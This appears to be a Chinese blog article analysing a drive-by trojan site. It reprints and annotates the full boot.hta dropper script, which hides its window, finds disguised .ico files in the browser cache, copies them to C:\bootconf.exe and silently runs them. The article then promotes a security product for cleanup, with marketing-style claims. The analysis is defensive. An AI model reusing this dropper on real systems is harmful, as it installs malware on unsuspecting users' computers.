| 篇首语:
虽说“亡羊补牢,为时不晚”,可对于互联网上的安全性而言,却又不是哪么一回事了。试问,当你的系统遭遇了病毒木马入侵,密码被盗、帐号丢失、重要文件被盗、游戏装备被卖等等之后,就算有杀毒软件清除,但损失的是谁呢?受伤的又是谁呢?这一切的一切都需要我们在事先有个准备,事先做好防御。“山雨欲来风满楼”,病毒的来临也是有症状的,就看你的防御系统是否已作好准备。。。
什么是挂马网?
挂马就是在网站里挂木马,首先是利用漏洞侵入网站后台,然后上传木马,就行了。详细去黑客网站看! (感觉听起来有些废话,将就着理解呗)
http://baike.baidu.com/list-php/dispose/search.php/?cid=354&cn=%C4%BE%C2%ED
(挂马涵义出处)
HTA简介:
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差别。
这时,也许就有网友要发话了,这与HTA有关系吗?
顾名思义,挂马网站,既然是网站,而且又挂着大家都很怕怕的木马,那么,它是怎么让我们中招的呢? IE浏览器。 对! 就是IE浏览器,人称“常在河边走,哪有不湿鞋”的? 对不? 而今天要说的这个挂马网就是用到了IE浏览器的Hta漏洞,该漏洞是由HTA应用程序被处理的方式引起。用户可能会被引诱来打开某个恶意文件,一旦打开文件就会导致代码的执行。
嗯。 开始有所了解了吧?那下面就该进入实际的环境中去探讨更多幕后的木马故事。
解读 boot.hta 文件源码
重新整理并注释上,带 // 部分为注释 <HTML>
<BODY onLoad=window.moveTo(5000,5000)>
<HEAD>
<SCRIPT language=JScript>
window.moveTo(6000,6000); // 移动窗口的屏幕位置到指定的偏移6000,6000(相对移动)
window.resizeTo(0,0); // 改变窗口大小到指定的高度与宽度(相对改变大小)
</SCRIPT>
</HEAD>
<HTA:APPLICATION ID=j3714 CAPTION="no" BORDER="none" HEIGHT="0" SHOWINTASKBAR="no" WIDTH="0" WINDOWSTATE="minimize"> // 窗口最小化
<BODY scroll="no" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript">
function China2008welcome(b){
// 嘿嘿嘿。。还 China2008welcome ,挺爱国的,可为什么把马下到自己家里呢??
try{var Break=new Enumerator(Iternater.GetFolder(b).SubFolders);
// 枚举网络相关的文件夹,如Temporary Internet Files之类的网络临时文件夹
for(;!Break.atEnd();Break.moveNext())
{var z0=Break.item().Path+"\\logo[1].ico";
var z1=Break.item().Path+"\\logo[2].ico";
//初始化变量, 供下马之用,这里可以看到,网站上应该存在这两个文件:logo[1].ico & logo[2].ico
var f="C:\\bootconf.exe";
// 定义下载后的路径及文件名,这也是为什么很多网友在电脑C盘中发现这几个文件的原因.
if(Iternater.FileExists(z0)){Iternater.CopyFile(z0,f)
// 有这个logo[1].ico文件吧? 那就拷贝到指定的C盘中,并命名为bootconf.exe
w1s2h.Run(f,0,false);v=1;break;}
// 下载后并试图激活这个病毒体
if(Iternater.FileExists(z1)){Iternater.CopyFile(z1,f);w1s2h.Run(f,0,false);v=1;break;}
// 与z0 一样,为了准确下马,预备了另外一只马. 并执行同样的操作...
China2008welcome(Break.item());}}catch(e){}}
function li1k1e1it(){window.close();j=1;}
// 自动关闭自身窗口 ,就是如图3的那个空白帮助文档窗口
var v=0; // 开始使用FSO脚本技术了...
try{
var Iternater=new ActiveXObject("Scripting.FileSystemObject");
var w1s2h=new ActiveXObject("WScript.Shell");
var cache=w1s2h.RegRead("HKCU\\Software\\Micr"+"osoft\\Windows\\Cu"+"rr"+"ent"+"Ver"+"si"+"on\\Ex"+"pl"+"orer\\Sh"+"ell Fol"+"ders\\Ca"+"che");
// 还原后:
// HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache
// 执行后,读取 cache 值:
//C:\Documents and Settings\icefire\Local Settings\Temporary Internet Files
}catch(e){}
function hatebj(){try{if(v==0){China2008welcome(cache+'\\..\\');setTimeout("hatebj()",4023);}else{opi=1;li1k1e1it();opi=2;}}catch(e){}}
hatebj();</SCRIPT></BODY></HTML> 这个,没看懂? 没关系,我也是一知半解的。这些都不重要,重要的是此时,我们“拿什么来拯救我们的爱机?” 其实,这也是我今天要讲的重点中的重点。
因为,这挂马网不是我的网站, 木马也不是我设计的。但是我又是怎么知道我系统中有这只马呢?(不知道是不是千里马?嘿嘿。。。)
事情是这样的。。。 安全预警响起
这几天在找些资料,互联网是很诱人的。现在的网站也太多广告之类的啦,都不知道怎么的就被吸引到一个美丽的地方(某个游戏网站)还没来得及欣赏内容,突然弹出一对话框(如图2),起始以为是什么正常的程序做的提示信息,点击确定后,却又弹出一个空白的帮助文档?(如图3) 还没来得及奇怪(奇怪帮助文档怎么没有文字内容的?),我的《终截者入侵阻止》中的“安全预警”响起,如图1所示: 
图1,安全预警 
图2,误以为是正常程序的信息框 
图3, 空白的帮助文档?
在“安全预警”中,我发现了这“父进程ID:mshta.exe(3996)”及“文件路径:c:\ bootconf.exe”。而 “安全预警”中的“危险等级”已经接近“最高”。
这时,凭我的经验,我知道这来者不善。本想在“安全预警”对话框中,选择“记住这个操作”并点击“删除”,仔细一想,先别删除了。万一是正常程序,删错了怎么办?或者也许还可以留个样本。于是点击“禁止”(表示禁止该程序的运行)。
后来,为了再次难证该程序是否正常的程序,我再次登录这个挂马网,当“安全预警”响起了警告时,我毅然点击了“允许”(佛不渡我,我自成魔)。嘿嘿。。。 《终截者入侵阻止》还是忠实地为了拦截了其他下载下来的木马。如下面几个图显示:(有近十来个病毒)
 
当发现这种问题时,我们首先要考虑的是如何清除这些木马!并达到更好的预防方式。 岂能容许漏网之“马”
避免有其他的“漏网之马”,我们可以用 Terminator Lab (终截者入侵阻止实验室)提供的免费工具《安全分析专家》,如下图所示:
发现两个危险等级的程序(这里省略其他的日志内容) #O4 危险 自启动:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\[Empty]]-d:\program files\internet explorer\plugins\system.sys #M0 危险 DLL:D:\WINDOWS\System32\mshtmlbd.dll 不知是意外发现还是病毒已经隐藏在我的电脑中了。不管怎样,还是要清除它的。
按照这个目录找到system.sys,删除它。提示无法删除?
因为它已经在某些程序内部了,这时我们是无法删除它的。
安全回归,回归安全
安全回归? 怎么不是97香港回归?这是《终截者入侵阻止》中的另一大亮点,它可以帮助你的系统迅速回归到一种无病毒、无干扰、无流氓软件的安全状态。经其他用户实际用例测试表明,“安全回归”对于一些顽固难清除的病毒、木马、后门有很强的清除功能。文章可以参考:
使用终截者清除灰鸽子2006
http://bbs.s-sos.net/viewthread.php?tid=631&extra=page%3D1
使用安全回归对付hxdef后门
http://bbs.s-sos.net/viewthread.php?tid=618&extra=page%3D1%26filter%3Ddigest 体能瞬间回归安全状态之旅,那我们就来试试它是否能有效对付顽固的病毒木马。GO。GO。GO。
第一步,点击“安全回归”按钮
 第二步,点击“运行安全回归”,随后会提醒你系统将要重启
如果有用《终截者入侵阻止》中的“安全回归”DIY解决这些实际问题的话,会发现其实这个 system.sys 文件感觉并没有被拦截在“安全回归”后听提示框中。我们这时尝试去删除这个 d:\program files\internet explorer\plugins\system.sys , 
这时,你看,我们可以清楚地看到,此时删除这个病毒,将不费吹灰之力! 安全回归魅力所在
从“安全分析专家”的日志中,我们看到这样的一条日志:
#O4 危险 自启动:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\[Empty]]-d:\program files\internet explorer\plugins\system.sys
为什么当时我删除它提示我删除成功? 而用了“安全回归”后就可以顺利删除呢?
因为用了 “安全回归”之后,《终截者入侵阻止》会禁止启动所有可能危害到系统安全的因素。这就在最大程度上保证了系统安全及达到无干扰、无病毒、高速运行的安全状态。这也是为什么能够在“安全回归”状态下,清除顽固的病毒木马!
在接下来的几个病毒及木马用例测试中,包括目前最流行的全能QQ大盗、阿啦QQ大盗、传奇木马、魔兽世界黑眼睛等等较强悍的病毒木马;其密码锁保护密码功能在某种意义似乎也用相同之处。不管是在处理病毒木马还是流氓软件上(因为病毒与流氓软件在某种意义上也有其相同之处,比如难清除,恢复能力强)这都给普通用户在清除上带来很多困难。而“安全回归”在某种意义上来讲,已经实现了这一梦想。打造了一个无病毒、无干扰、高速运行的安全状态! 后话:
由一个挂马网引发的“伯乐识马”。到了最后不免让人深思:现在的网络怎么啦?似乎到处都是一片阴暗?都是哪么的充满陷阱?那么的令人心神不安? 谁知道哪一天,打开电脑屏幕就是一片黑暗? 不过, 这也正应了那句“千里马常有,而伯乐不常有”啊。此时的你,电脑中是否已经有了这个能识别“万里马,千里马”的伯乐(终截者入侵阻止)了吗? |